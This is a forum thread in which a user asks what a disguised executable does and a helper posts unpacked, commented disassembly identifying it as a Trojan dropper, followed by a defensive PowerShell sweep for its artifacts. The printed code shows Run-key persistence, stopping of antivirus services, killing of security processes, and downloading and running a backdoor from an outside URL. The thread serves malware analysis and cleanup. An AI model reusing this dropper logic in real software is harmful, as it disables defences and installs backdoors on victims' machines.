joyrider

asked on

What does this asm code do?

Hi,

I had the unfortunate accident of running an exe (it was spoofed as another file) and I don't know what it did.
I can't see anything (atm) changed or broken on my PC, but I'd still like to know what it did!
I disassembled the file using some tool and got some asm code, but I don't understand it, so please tell me what it does!
The asm code and program (in case you need it) are both here:
http://users.pandora.be/IMS/help/
The program is called dontrun.ttt; I renamed it as a safety measure. Just don't run it, because I don't know what it does.
The asm code I got is in dontrun.asm.

Please tell me what it does, because I'm a bit worried. Thanks!

BeyondWu

OK, I have downloaded it. After a little investigation, it seems to be encrypted with a simple compacter (I don't know which tool), so I tried to debug it. It's dangerous, so I actually haven't really run it; after the loader decrypted the original code in memory, I dumped it and then disassembled it.
It's a Trojan virus. Please search for "windows33.exe" and "xtb.exe" on your PC. xtb.exe is downloaded from this URL: "http://www.phoenix.secure-tech.net/web/xxx.exe".
I will post the asm code in the next comment.
Here is the code; the application list has been omitted, as it's too long to put here.
 start:
                 push    100h            ; sizeof szWindowsDir
                 push    offset szWindowsDir
                 call    GetWindowsDirectory
                 push    offset szSlash  ; "\\"
                 push    offset szWindowsDir
                 call    lstrcat
                 push    offset szWindows33_exe ; "windows33.exe"
                 push    offset szWindowsDir
                 call    lstrcat
                 push    offset lpFindFileData
                 push    offset szWindowsDir
                 call    FindFirstFile
                 cmp     eax, 0FFFFFFFFh
                 jz      short NotFound
                 jmp     short FoundIt

 NotFound:
                 push    100h
                 push    offset szVictimExeFile
                 push    0
                 call    GetModuleFileName
                 push    0
                 push    offset szWindowsDir
                 push    offset szVictimExeFile
                 call    CopyFile
                 push    offset sizeofWin33Data
                 push    20006h
                 push    0
                 push    offset aSoftwareMicros ; SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                 push    80000002h
                 call    RegOpenKeyEx
                 push    eax             ; hKey
                 push    offset szWindowsDir
                 push    1
                 push    0
                 push    offset Win33Data ; "windows33"
                 push    ds:sizeofWin33Data
                 call    RegSetValueEx
                 push    ds:sizeofWin33Data
                 call    RegCloseKey

 FoundIt:
                 push    offset szKernel32_dll ; "kernel32.dll"
                 call    GetModuleHandle
                 push    offset aRegisterservic ; "RegisterServiceProcess"
                 push    eax
                 call    GetProcAddress
                 test    eax, eax
                 jz      short CannotFindApi
                 push    1
                 push    0
                 call    eax             ; call RegisterServiceProcess
                 jmp     short CallApiSuccessful ; hide myself, only available under Win9x

 CannotFindApi:
                 push    0
                 push    offset aNetStopNavapsv ; "NET STOP NAVAPSVC"
                 call    WinExec
                 push    0
                 push    offset aNetStopPersfw ; "NET STOP PERSFW"
                 call    WinExec
                 push    0
                 push    offset aNetStopAvpcc ; "NET STOP AVPCC"
                 call    WinExec
 
 CallApiSuccessful:
                 lea     esi, pAppList
 
 loopit:
                 lodsb
                 test    al, al                  ; if terminate?
                 jnz     short loopit
                 mov     al, [esi]
                 test    al, al
                 jz      short gotfilenameend
                 push    esi                        ; esi->app name
                 call    killprocess
                 jmp     short loopit

 gotfilenameend:
                 push    100h
                 push    offset szWindowsDir
                 call    GetWindowsDirectory
                 push    offset szSlash  ; "\\"
                 push    offset szWindowsDir
                 call    lstrcat
                 push    offset aXtb_exe ; "xtb.exe"
                 push    offset szWindowsDir
                 call    lstrcat
                 push    offset lpFindFileData
                 push    offset szWindowsDir
                 call    FindFirstFile
                 cmp     eax, 0FFFFFFFFh
                 jz      short HasntFoundIt
                 jmp     short HasFoundIt
 
 HasntFoundIt:
                 call    DownloadIt      ; if we haven't found it, download it from
                                         ; http://www.phoenix.secure-tech.net/web/xxx.exe
 HasFoundIt:
                 push    1388h
                 call    Sleep
                 push    offset aKernel32_dll ; "kernel32.dll"
                 call    GetModuleHandle
                 push    offset aRegisterservic ; "RegisterServiceProcess"
                 push    eax
                 call    GetProcAddress
                 test    eax, eax
                 jz      CannotFindApi
                 jmp     CallApiSuccessful

                 push    eax
                 call    ExitProcess
 
 
 
 killprocess    proc szTargetExeName:LPSTR
                         LOCAL szTmpExeFile[256]:BYTE
                         LOCAL procsentry:PROCESSENTRY32
                 push    ebp
                 mov     ebp, esp
                 add     esp, 0FFFFFDD4h
                 mov     procsentry.dwSize, sizeof PROCESSENTRY32 ;128h
                 push    0      ; means current process
                 push    2
                 call    CreateToolhelp32Snapshot
                 mov     hSnapshot, eax
                 mov     edi, szTargetExeName
                 lea     eax, procsentry
                 push    eax
                 push    hSnapshot
                 call    Process32First
 
 continue:
                 lea     eax, szTmpExeFile
                 push    eax
                 lea     eax, procsentry.szExeFile
                 push    eax
                 call    splitfilename            ; get the file name separate from the path
                 lea     eax, szTmpExeFile
                 push    eax
                 push    edi
                 call    lstrcmpi                  ; compare the exe name with szTargetExeName
                 test    eax, eax
                 jnz     short notequal
                 push    procsentry.th32ProcessID
                 push    0
                 push    1
                 call    OpenProcess                  ; get target process handle
                 push    0
                 push    eax
                 call    TerminateProcess      ; terminate it.
                 push    64h
                 call    Sleep
 
 notequal:
                 lea     eax, procsentry
                 push    eax
                 push    hSnapshot
                 call    Process32Next            ; find next
                 test    eax, eax
                 jz      short finished
                 jmp     short continue
 
 finished:
                 push    hSnapshot
                 call    CloseHandle
                 leave
                 retn    4
 killprocess    endp
 
 
 splitfilename    proc szPathName:LPSTR, szName:LPSTR
                 push    ebp
                 mov     ebp, esp
                 push    esi
                 push    edi
                 push    ebx
                 push    eax
                 mov     esi, szPathName
                 mov     ebx, esi
 
 searchagain:
                 lodsb
                 cmp     al, 0                        ; if terminate?
                 jz      short finished
                 cmp     al, '\'
                 jnz     short searchagain      ; find the '\'
                 mov     ebx, esi                  ; save the position of next char
                 jmp     short searchagain      ; actually, need to find last '\'
 
 finished:
                 mov     edi, szName
                 mov     esi, ebx
 
 loooop:
                 lodsb                                    ; copy the name except the path
                 stosb
                 cmp     al, 0
                 jnz     short loooop
                 pop     eax
                 pop     ebx
                 pop     edi
                 pop     esi
                 leave
                 retn    8
 splitfilename    endp
 
 
 
 DownloadIt      proc near
 repeatit:
                 push    offset lpWSAData
                 push    101h
                 call    WSAStartup
                 cmp     eax, 0
                 jnz     short repeatit      ; if not success
 
 doitagain:
                 push    offset szUrlMicrosoft ; "www.microsoft.com"
                 call    gethostbyname
                 cmp     eax, 0
                 jz      short getnameerror      ; false
                 jnz     short getnameok
 
 getnameerror:
                 push    1388h
                 call    Sleep
                 jmp     short doitagain
 
 getnameok:
                 push    0
                 push    0
                 push    offset szWindowsDir
                 push    offset aHttpWww_phoeni ; "http://www.phoenix.secure-tech.net/web/xxx.exe"
                 push    0
                 call    URLDownloadToFile
                 push    0
                 push    offset szWindowsDir
                 call    WinExec                              ; download it, then execute it.
                 xor     eax, eax
                 call    WSACleanup
                 retn
 DownloadIt      endp

 aXtb_exe        db 'xtb.exe'
                 db 20 dup(0)  
 aHttpWww_phoeni db 'http://www.phoenix.secure-tech.net/web/xxx.exe',0
                 dd 4 dup(0)
                 align 4
 szUrlMicrosoft  db 'www.microsoft.com',0
 aKernel32_dll   db 'kernel32.dll',0
 aRegisterservic db 'RegisterServiceProcess',0
 pAppList        db    0 ;  
 a_avpcc_exe     db '_AVPCC.EXE',0
      ; ... here a long list of application's name omitted ...
 aZonealarm_exe  db 'ZONEALARM.EXE'
                 db 3 dup(0)
 aNetStopNavapsv db 'NET STOP NAVAPSVC',0
 aNetStopAvpcc   db 'NET STOP AVPCC',0
 aNetStopPersfw  db 'NET STOP PERSFW',0
 szSlash         db '\',0
 aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
 Win33Data       db 'windows33',0
                 dd 4 dup(0)
                 db 2 dup(0)
 szWindows33_exe db 'windows33.exe',0
                 dd 4 dup(?)
 sizeofWin33Data dd ?
 hSnapshot              dd ?
                 dd ?
 lpFindFileData  dd 4Fh dup(?)
                 db 2 dup(?)
 szWindowsDir    dd 40h dup(?)
 szVictimExeFile dd 40h dup(?)
 lpWSAData       dd 354h dup(?)
                 db 2 dup(?)
In addition, I just downloaded 'http://www.phoenix.secure-tech.net/web/xxx.exe'; it is compacted with UPX.
joyrider

ASKER

Hi, I uploaded windows33.exe as well; it seems it's just a copy of the original dontrun.exe file. I also immediately found out it added an entry to the registry, so I removed that. After downloading XTB.exe my NAV found it as an IRC.Backdoor.Trojan.

Now I also ran it on an older PC where I had a file monitor and registry monitor running. What was weird is that the windows33.exe file kept looking in the registry at printer settings and also scanned through the whole mm256.dat in the inter history folder, so I guess it collects the sites you've been to, to get any passwords.

Now the big question: since I removed all the startup entries in the registry for this windows33.exe and removed both windows33.exe and xtb.exe, can I assume it's safe now? I tried both a complete system scan and a Trojan scan.

You're getting the points since you helped me, but I'd just like to know if I need to format or not.
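A read-only sweep for the artifacts the disassembly above describes (the Run value "windows33" pointing at %WINDIR%\windows33.exe, the dropped files windows33.exe and xtb.exe, and any process still running under those names), added here as an example to answer the "is it gone?" question; it is not code from either poster. It assumes a modern PowerShell host; the Wow6432Node Run key is an assumption for a 32-bit sample on a 64-bit Windows.

```powershell
# Added example, not from the original thread: read-only sweep for the artifacts
# named in the disassembly. Nothing here deletes or modifies anything.
$dropFiles = @('windows33.exe', 'xtb.exe')          # names the sample writes to %WINDIR%
$valueName = 'windows33'                             # RegSetValueEx value name in the asm
$runKeys   = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'  # assumed: 32-bit view on x64
)
$findings  = @()

# 1. Persistence: a Run value named "windows33" (the sample stores the exe's full path as its data)
foreach ($key in $runKeys) {
    $run = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if ($run -and ($run.PSObject.Properties.Name -contains $valueName)) {
        $findings += "Run value '$valueName' in $key -> $($run.$valueName)"
    }
}

# 2. Dropped files: %WINDIR%\windows33.exe (self-copy) and %WINDIR%\xtb.exe (downloaded payload)
foreach ($name in $dropFiles) {
    $path = Join-Path $env:windir $name
    if (Test-Path -LiteralPath $path -PathType Leaf) {
        $sha = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
        $findings += "File present: $path (SHA256 $sha)"
    }
}

# 3. Live processes still running under either name
$procs = Get-Process -ErrorAction SilentlyContinue |
    Where-Object { $dropFiles -contains "$($_.ProcessName).exe" }
foreach ($p in $procs) {
    $findings += "Process running: $($p.ProcessName) (PID $($p.Id))"
}

if ($findings.Count -eq 0) { 'No windows33/xtb artifacts found.' } else { $findings }
```

If windows33.exe is still present, comparing its SHA256 with the hash of the renamed dontrun.ttt confirms the asker's observation that it is a plain self-copy.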
ASKER CERTIFIED SOLUTION
BeyondWu

thanks for the help!